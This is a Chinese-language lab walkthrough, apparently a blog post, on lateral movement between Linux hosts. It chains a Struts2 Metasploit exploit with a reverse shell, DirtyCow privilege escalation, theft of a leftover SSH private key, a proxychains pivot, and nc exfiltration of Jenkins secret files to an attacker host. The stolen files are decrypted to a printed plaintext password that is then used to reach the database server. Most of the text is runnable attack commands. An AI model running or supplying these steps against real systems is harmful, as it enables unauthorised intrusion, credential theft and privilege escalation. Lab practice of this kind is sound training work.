【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全

文章目录

  • 章节点
    • linux靶场搭建
  • 横向移动-Linux靶场-SSH协议&RSA密匙凭证
  • 横向移动-Linux靶场-提权&SSH&密匙&Jenkins等
    • 1、Web DMZ权限获取
    • 2、Jenkins DMZ权限获取
    • 3、Database DMZ权限获取

章节点

IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH,Exchange,LLMNR投毒,NTLM-Relay,Kerberos_TGS,GPO&DACL,域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。

linux靶场搭建

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第1张图片

横向移动-Linux靶场-SSH协议&RSA密匙凭证

~/.ssh/config
~/.ssh/known_hosts
~/.bash_history

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第2张图片
一般情况下SSH密钥存放在~/.ssh/目录下,也可以文件中搜索已保存的SSH凭证

grep -ir "BEGIN RSA PRIVATE KEY" /*
grep -ir "BEGIN DSA PRIVATE KEY" /*
grep -ir "BEGIN OPENSSH PRIVATE KEY" /*

参考:https://www.runoob.com/w3cnote/set-ssh-login-key.html

横向移动-Linux靶场-提权&SSH&密匙&Jenkins等

kali同局域网只能通讯web(172.16.250.10)
【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第3张图片

1、Web DMZ权限获取

信息收集:
nmap 172.16.250.0/24
172.16.250.10 80开放
/struts2-showcase
【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第4张图片
利用漏洞:

msfconsole
use exploit/multi/http/struts2_content_type_ognl
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 172.16.250.10
set lport 80
run

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第5张图片
权限提升:

curl https://raw.githubusercontent.com/sqlnetcat/dirtycow-mem/master/dirtycow-mem.c
upload /root/dirtycow-mem.c /tmp
shell
gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第6张图片

python3 -c "import pty;pty.spawn('/bin/bash')"		#转化为有交互式的tty窗口
./dirtycow-mem

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第7张图片

持续稳定:

echo 0 > /proc/sys/vm/dirty_writeback_centisecs	#将写回脏页面的间隔时间设置为0秒。这意味着如果有脏页面需要写回,内核会立即进行写回操作,而不等待指定的时间间隔。
echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn		#将Linux内核的系统崩溃(panic)功能打开,并启用不同类型的崩溃触发器。这样,在出现严重问题时,内核会自动崩溃并停止系统运行。这有助于避免数据损坏和其他可能的问题。

横向移动:

cat /opt/tomcat/webapps/kittens/WEB-INF/config/opencms.properties	#查看数据库配置文件  站库分离模式

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第8张图片
查看历史命令获取到一些信息
【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第9张图片
尝试访问

cat ~/.bash_history
cp ~/.ssh/id_rsa /tmp/id_rsa
chmod 777 id_rsa
download  /tmp/id_rsa /root/id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第10张图片

2、Jenkins DMZ权限获取

信息收集:
getuid
netstat -anpt
172.16.250.30 8080开放
【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第11张图片
建立节点:

use auxiliary/server/socks_proxy
vim /etc/proxychains4.conf

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第12张图片
注意这里:
dynamic_chain:下方代理节点有一条测试正确也可以使用
strict_chain:如果下方设置了多个节点,必须都测试正确才可以使用
【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第13张图片
172.16.250.30 8080开放 jenkins服务

proxychains firefox

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第14张图片
【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第15张图片

攻击Jenkins:
利用nc将文件反向传递,如果想通过30让50上线的话,需要将流量进行封装成ssh通道,因为10可以访问30的22端口
nc -lvp 1234 > master.key
nc -lvp 1234 > hudson.util.Secret
nc -lvp 1234 > credentials.xml
nc 172.16.250.128 1234 < /home/jenkins/secrets/hudson.util.Secret
nc 172.16.250.128 1234 < /home/jenkins/secrets/master.key
nc 172.16.250.128 1234 < /home/jenkins/credentials.xml
【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第16张图片
破解密匙:
https://github.com/cheetz/jenkins-decrypt

python decrypt.py master.key hudson.util.Secret credentials.xml

注意这里需要python3低版本才能正常解密使用
成功解密后密码为:)uDvra{4UL^;r?*h

利用30上面的jenkins服务的密码密钥进行横向移动

3、Database DMZ权限获取

密码横向:
ssh [email protected]
)uDvra{4UL^;r?*h
权限提升:
getuid
sudo su

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全_第17张图片

你可能感兴趣的:(#,内网渗透,jenkins,横向移动,内网渗透,RSA密钥)